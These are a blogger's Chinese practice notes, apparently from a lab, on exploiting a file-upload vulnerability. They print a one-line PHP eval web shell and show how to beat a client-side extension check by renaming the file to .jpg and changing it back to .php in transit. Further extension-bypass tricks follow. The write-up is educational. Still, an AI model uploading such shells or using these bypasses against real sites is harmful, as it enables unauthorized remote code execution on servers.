温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

文件上传漏洞练习笔记(1)

发布时间:2020-05-24 15:02:20 来源:网络 阅读:2384 作者:Alyoyojie 栏目:安全技术

(1)打开网站
文件上传漏洞练习笔记(1)
(2)我们注意到一个图片上传,先传个jpg看看
文件上传漏洞练习笔记(1)
(3)结果中可以看到Stored in: upload/Tulips.jpg
先记一下,这个是文件的保存路径,后边会用到。
下边开始看看传其他文件,php,或随便一个后缀名文件,探究他的过滤能力
我写了个php文件为1text.php

<?php @eval($_POST['c']);?>  

文件上传漏洞练习笔记(1)

(4)我们发现不能上传文件,可是又抓包抓不到,可以判定,在本地做了文件过滤
这时候,我们可以看看源代码,发现有后缀名的校验

文件上传漏洞练习笔记(1)

(5)我们现在把1test.php改为1test.jpg

文件上传漏洞练习笔记(1)

(6)可以发现文件是可以上传成功的。
文件上传漏洞练习笔记(1)

(7)但显然,这个也不是我们要的结果,jpg格式不能直接解析
这个时候,我们想想是不是可以在上传的时候将文件名改回php

文件上传漏洞练习笔记(1)

(8)居然成功了,,我们菜刀连一下,。。网速太渣,就这样把

文件上传漏洞练习笔记(1)



(9)下边提升下难度,如果上传不成功,

 使用大小写测试,或加 1 2 3 4 5 等,再或者尝试pht文件
向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI